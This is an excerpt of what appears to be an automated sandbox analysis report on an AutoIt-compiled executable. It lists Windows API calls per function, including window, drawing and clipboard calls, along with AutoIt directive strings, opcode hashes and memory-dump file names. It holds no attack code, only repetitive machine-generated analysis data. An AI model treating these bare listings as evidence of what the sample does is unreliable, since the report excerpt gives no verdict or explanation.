                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: NameUser
                                                                    • String ID:
                                                                    • API String ID: 2645101109-0
                                                                    • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                    • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                    • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                    • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 00422033
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                    • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                    • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                    • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                    • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                    • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                    • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                    • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                    • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                    • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                    • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                    • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                    • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                    • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                    • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                    • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                    • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                    • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                    • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                    APIs
                                                                    • DeleteObject.GDI32(?), ref: 004593D7
                                                                    • DeleteObject.GDI32(?), ref: 004593F1
                                                                    • DestroyWindow.USER32 ref: 00459407
                                                                    • GetDesktopWindow.USER32 ref: 0045942A
                                                                    • GetWindowRect.USER32(00000000), ref: 00459431
                                                                    • SetRect.USER32 ref: 00459568
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                    • CreateWindowExW.USER32 ref: 004595BB
                                                                    • GetClientRect.USER32(00000000,?,?,50000001,?,?,00000000,00000000,00000000), ref: 004595C8
                                                                    • CreateWindowExW.USER32 ref: 00459615
                                                                    • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000), ref: 00459635
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00459678
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00459686
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00459694
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                    • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                    • CopyImage.USER32 ref: 004596EF
                                                                    • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 0045973D
                                                                    • ShowWindow.USER32(?,00000004), ref: 0045974B
                                                                    • CreateWindowExW.USER32 ref: 0045979C
                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                    • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                    • GetTextFaceW.GDI32(00000000,00000040,00000190), ref: 004597CD
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A,?,50000001,?,?,00000000,00000000,00000000), ref: 004597D6
                                                                    • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                    • _wcslen.LIBCMT ref: 00459800
                                                                    • _wcscpy.LIBCMT ref: 0045981F
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                    • GetDC.USER32(?), ref: 004598DE
                                                                    • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                    • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                    • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                    • ShowWindow.USER32(?,00000004), ref: 00459951
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                    • API String ID: 4040870279-2373415609
                                                                    • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                    • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                    • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                    • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                    APIs
                                                                    • GetSysColor.USER32(00000012), ref: 00441E64
                                                                    • SetTextColor.GDI32(?,?), ref: 00441E6C
                                                                    • GetSysColorBrush.USER32 ref: 00441E83
                                                                    • GetSysColor.USER32(0000000F), ref: 00441E8F
                                                                    • SetBkColor.GDI32(?,?), ref: 00441EAA
                                                                    • SelectObject.GDI32(?,?), ref: 00441EBA
                                                                    • InflateRect.USER32 ref: 00441EF0
                                                                    • GetSysColor.USER32(00000010), ref: 00441EF8
                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                                                                    • FrameRect.USER32 ref: 00441F10
                                                                    • DeleteObject.GDI32(?), ref: 00441F1B
                                                                    • InflateRect.USER32 ref: 00441F75
                                                                    • FillRect.USER32 ref: 00441FB6
                                                                      • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433D81
                                                                      • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                      • Part of subcall function 00433D5C: GetSysColorBrush.USER32 ref: 00433DBF
                                                                      • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DCB
                                                                      • Part of subcall function 00433D5C: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DEB
                                                                      • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                      • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                      • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                                                                      • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                                                                      • Part of subcall function 00433D5C: InflateRect.USER32 ref: 00433E54
                                                                      • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                      • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                                                                      • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                    • String ID:
                                                                    • API String ID: 69173610-0
                                                                    • Opcode ID: 760e9195f0a87e08d05fd531739ae3f719c09107b1b83ff340ed5b74c02eb0d1
                                                                    • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                                                                    • Opcode Fuzzy Hash: 760e9195f0a87e08d05fd531739ae3f719c09107b1b83ff340ed5b74c02eb0d1
                                                                    • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                    • API String ID: 1038674560-3360698832
                                                                    • Opcode ID: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
                                                                    • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                                    • Opcode Fuzzy Hash: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
                                                                    • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                                    APIs
                                                                    • GetSysColor.USER32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433D81
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                    • GetSysColor.USER32(00000012,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DA3
                                                                    • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                    • GetSysColorBrush.USER32 ref: 00433DBF
                                                                    • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DCB
                                                                    • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                    • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DEB
                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                    • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                    • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                    • SelectObject.GDI32(?,?), ref: 00433E29
                                                                    • InflateRect.USER32 ref: 00433E54
                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                    • GetWindowLongW.USER32 ref: 00433E8A
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                    • GetWindowTextW.USER32(00000000,00000000,00000105,?,?,?,?,?,?,?,?,?,?,00441E27,?,?), ref: 00433EE1
                                                                    • InflateRect.USER32 ref: 00433F13
                                                                    • DrawFocusRect.USER32 ref: 00433F1F
                                                                    • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                    • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                    • SelectObject.GDI32(?,?), ref: 00433F63
                                                                    • DeleteObject.GDI32(?), ref: 00433F70
                                                                    • SelectObject.GDI32(?,?), ref: 00433F78
                                                                    • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                    • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                    • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 1582027408-0
                                                                    • Opcode ID: 67113f5f527fcc562f8c2e4ca9e0caa3b74bab30480d735e2179bbd553bc1799
                                                                    • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                    • Opcode Fuzzy Hash: 67113f5f527fcc562f8c2e4ca9e0caa3b74bab30480d735e2179bbd553bc1799
                                                                    • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                    APIs
                                                                    • OpenClipboard.USER32(?), ref: 0046C635
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                    • GetClipboardData.USER32 ref: 0046C64F
                                                                    • CloseClipboard.USER32 ref: 0046C65D
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                    • CloseClipboard.USER32 ref: 0046C692
                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                    • GetClipboardData.USER32 ref: 0046C6DD
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                    • CloseClipboard.USER32 ref: 0046C866
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                    • String ID: HH
                                                                    • API String ID: 589737431-2761332787
                                                                    • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                    • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                                                    • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                    • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 00456692
                                                                    • GetDesktopWindow.USER32 ref: 004566AA
                                                                    • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                    • DestroyWindow.USER32 ref: 00456731
                                                                    • CreateWindowExW.USER32 ref: 00456779
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                    • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                    • IsWindowVisible.USER32(?), ref: 00456812
                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                    • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                    • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                    • GetMonitorInfoW.USER32 ref: 00456894
                                                                    • CopyRect.USER32(?,?), ref: 004568A8
                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                    • String ID: ($,$tooltips_class32
                                                                    • API String ID: 541082891-3320066284
                                                                    • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                    • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                    • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                    • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                    APIs
                                                                    • GetSysColor.USER32 ref: 0044A11D
                                                                    • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                    • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                    • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                    • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                    • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                    • GetWindowDC.USER32 ref: 0044A277
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                    • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                    • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                    • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
